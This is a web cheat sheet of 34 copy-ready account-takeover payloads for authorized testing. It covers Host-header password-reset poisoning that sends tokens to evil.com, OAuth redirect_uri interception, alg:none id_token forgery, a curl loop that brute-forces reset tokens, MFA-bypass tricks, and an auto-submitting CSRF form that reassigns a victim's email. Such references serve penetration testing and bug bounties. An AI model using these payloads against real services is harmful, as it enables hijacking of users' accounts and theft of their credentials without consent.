Account Takeover (ATO) Cheat Sheet

Account takeover techniques: password reset poisoning, reset-token leakage and prediction, OAuth/SSO flaws, email/2FA-change abuse, and CSRF chains that bind an attacker to a victim's account. (34 payloads)

Try it interactively with the OAuth / OIDC Attack Wizard

Password Reset Poisoning (Host Header)

(5)

POST /reset HTTP/1.1
Host: evil.com

[email protected]

App builds the reset link from the Host header. The victim receives a real email but the link points to evil.com — clicking it (or any prefetch) leaks the token to your server.classic reset poisoning

Host: target.com
X-Forwarded-Host: evil.com

When the front-end pins Host, fall back to X-Forwarded-Host / X-Forwarded-Server / X-Host — many frameworks trust these to reconstruct the absolute reset URL.header-spoofing variant

Host: target.com:@evil.com
Host: target.com\nHost: evil.com

Dual-Host / userinfo / line-injection tricks: the validator sees target.com while the URL builder resolves to evil.com.Host parser confusion

POST /reset
Host: target.com

[email protected]&X-Forwarded-Host=evil.com

Web-cache / param-in-body poisoning: some apps reflect a forwarded-host param into the templated link. Test body and query as well as headers.secondary injection points

GET /reset?token=... (Referer: https://evil.com)

Even with a correct Host, the reset page may load attacker-controlled JS/analytics that exfiltrate the token via the Referer header or window.location.token leak post-click

Reset Token Leakage & Prediction

(6)

Reset password, then inspect the JSON/HTML response and Set-Cookie for the token

Misconfigured APIs return the reset token (or a one-time login link) directly in the 'forgot password' response body instead of only emailing it.token in response

GET /api/[email protected] → look for resetToken / passwordResetToken field

Excessive data exposure: a profile or admin endpoint leaks the stored reset token, letting you set the password without any email.IDOR-style leak

Request 3+ tokens and diff them (sequential, timestamp, or short numeric)

Predictable tokens — md5(time()), incrementing IDs, 4–6 digit OTPs, or UUIDv1 (time+MAC) — are brute-forceable or guessable. Capture entropy with Burp Sequencer.weak token generation

for i in $(seq 0 9999); do curl -s "$URL/reset?token=$(printf '%04d' $i)" ...; done

Short numeric OTP codes with no rate limit or lockout fall to a few-minute brute force. Watch for distinct success vs failure length/status (use response-diff).OTP brute force

Reuse a token after it 'expired' or after a successful reset

Tokens must be single-use and time-bound. Replay an old token, or use one issued before the account email changed — many apps never invalidate it.token lifecycle flaws

Submit token belonging to victim while logged in as attacker (no email binding)

If the reset endpoint trusts the token but not which account it was issued for, you can set the victim's password with a token tied only to the request, not the user.token/account decoupling

Email & Identifier Confusion

(5)

[email protected]&[email protected]

Parameter pollution on the reset request: validation reads the first email, delivery reads the last (or vice versa) — token for victim's account is sent to you.HPP on reset

{"email":["[email protected]","[email protected]"]}

Array/object injection in a JSON reset body. The backend may iterate and send to all addresses, or the type-juggle bypasses an equality check.JSON type confusion

[email protected]%0a%0dcc:[email protected] / "[email protected]"@evil.com

Header-injection and quoted-local-part tricks add a Cc/Bcc or change the envelope so a copy of the reset mail reaches the attacker.email header injection

Register [email protected] or [email protected] (Unicode/case normalization)

Two records resolve to one inbox or one identity after normalization — create a colliding account, then merge/escalate into the victim's via shared email.identifier normalization

Register account with unverified email = [email protected], then trigger SSO merge

If signup doesn't verify the email and login auto-links accounts by email, the unverified attacker account merges with the victim's verified SSO identity.pre-account / merge takeover

OAuth / SSO Login Takeover

(6)

GET /oauth/authorize?...&redirect_uri=https://evil.com&response_type=code

Lax redirect_uri validation sends the authorization code to your domain. Combine with subdomain confusion (app.com.evil.com) or path traversal in the callback path.code interception

Replace your code/token in the callback with the victim's (no state binding)

Missing/unbound state means the IdP response isn't tied to the user's browser — feed a victim a link that completes login with the attacker's code (login CSRF), or vice versa.state CSRF

Use a code/access_token issued for App-A on App-B's /oauth/callback

Token/audience confusion: if a relying party doesn't verify the token's aud/client_id, a token minted for a malicious client logs you into the real app.client/aud confusion

Sign in with Google using [email protected] on an app that links by email

Account linking purely on email lets any IdP that doesn't verify ownership (or a self-hosted IdP you control) take over the matching local account.broken account linking

Decode the id_token, swap the sub/email claim, drop the signature (alg:none)

If the RP doesn't verify the JWT signature or only trusts the email claim, forge the identity. Test alg:none, HS/RS confusion, and unvalidated aud/nonce.id_token forgery

Leak access_token from URL fragment via Referer / open redirect on the callback

Implicit-flow tokens sit in location.hash; an open redirect or third-party script on the callback page exfiltrates them, granting full account access.implicit token leak

Email / 2FA Change & MFA Bypass

(6)

POST /account/email {newEmail: [email protected]} — no current-password / re-auth

Changing the recovery email without step-up auth means a CSRF or stolen-session attacker reassigns the account, then resets the password to themselves.email change without re-auth

Disable 2FA endpoint reachable without re-entering an OTP or password

If /2fa/disable or /2fa/remove doesn't require the current factor, an attacker with a session (or CSRF) strips MFA before takeover.MFA removal

Brute-force the 6-digit TOTP/SMS code — no rate limit / no attempt counter

10^6 space falls quickly without lockout. Also test code reuse, codes valid across time windows, and whether old codes stay valid after a new one is sent.OTP brute force

Drop the 2FA step: go straight to the post-login endpoint after step-1 auth

Forced-browsing past the MFA gate — if the session is already authenticated before the second factor, request a protected page directly to skip 2FA.response/flow manipulation

Intercept the 2FA response and change {"verified":false} → true / 401 → 200

Client-trusted MFA result: flip the server response (or a status code) and the SPA proceeds as authenticated.response tampering

Use a leftover 'remember this device' token / backup code on the victim

Trusted-device cookies and printed backup codes often bypass MFA and may be predictable, reusable, or not invalidated on password reset.MFA backdoor reuse

CSRF & Response Manipulation Chains

(6)

<form action=https://target.com/account/email method=POST><input name=email [email protected]></form><script>document.forms[0].submit()</script>

No CSRF token on the email-change endpoint → silently reassign the victim's account, then 'forgot password' to it. The canonical CSRF→ATO chain.email-change CSRF

Login CSRF: auto-submit the attacker's credentials, then plant a stored payload

Force the victim into the attacker's session so the victim's saved data (card, address, search history) flows to the attacker's account.login CSRF

GET /account/link-oauth?code=ATTACKER_CODE (no state) via <img>

CSRF on the OAuth account-link endpoint binds the attacker's social login to the victim's account, granting persistent attacker access.OAuth link CSRF

Change HTTP/1.1 401/403 → 200, or {"success":false} → true in the login response

SPAs that trust the response to decide auth state can be tricked locally (and sometimes via cache/proxy) into a logged-in view; pivot to leaked tokens in the body.client-side auth trust

Submit reset-password POST without the old session, observe Set-Cookie auto-login

Some flows log the user in immediately after reset and return a fresh session — chain a poisoned/leaked token straight into an authenticated session, no password needed.reset → auto session

Compare attacker vs victim sessions/JWTs side by side (session-compare)

Diff cookies and token claims after each step to confirm whose account you actually hold — essential when juggling merge, link, and reset chains.verification step

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

CSRF Cheat Sheet JWT Attacks Cheat Sheet OAuth & OIDC Security Cheat Sheet Session & Cookie Attacks Cheat Sheet

Frequently asked questions

What is the Account Takeover (ATO) Cheat Sheet?+

It's a quick-reference collection of 34 Account Takeover payloads for testing Account Takeover (ATO) vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Account Takeover payloads?+

Copy any payload straight into your authorized test, or use the OAuth / OIDC Attack Wizard to apply them interactively. Only test systems you have explicit permission to assess.

Are these Account Takeover payloads free to use?+

Yes — this cheat sheet and all Account Takeover payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Account Takeover (ATO) Cheat Sheet?+

How do I use these Account Takeover payloads?+

Copy any payload straight into your authorized test, or use the OAuth / OIDC Attack Wizard to apply them interactively. Only test systems you have explicit permission to assess.

Are these Account Takeover payloads free to use?+

Yes — this cheat sheet and all Account Takeover payloads are completely free, with no account required. Everything runs in your browser.

Account Takeover (ATO) Cheat Sheet

Password Reset Poisoning (Host Header)

Reset Token Leakage & Prediction

Email & Identifier Confusion

OAuth / SSO Login Takeover

Email / 2FA Change & MFA Bypass

CSRF & Response Manipulation Chains

Related Tools

Related Cheat Sheets

Frequently asked questions

Account Takeover (ATO) Cheat Sheet

Password Reset Poisoning (Host Header)

Reset Token Leakage & Prediction

Email & Identifier Confusion

OAuth / SSO Login Takeover

Email / 2FA Change & MFA Bypass

CSRF & Response Manipulation Chains

Related Tools

Related Cheat Sheets

Frequently asked questions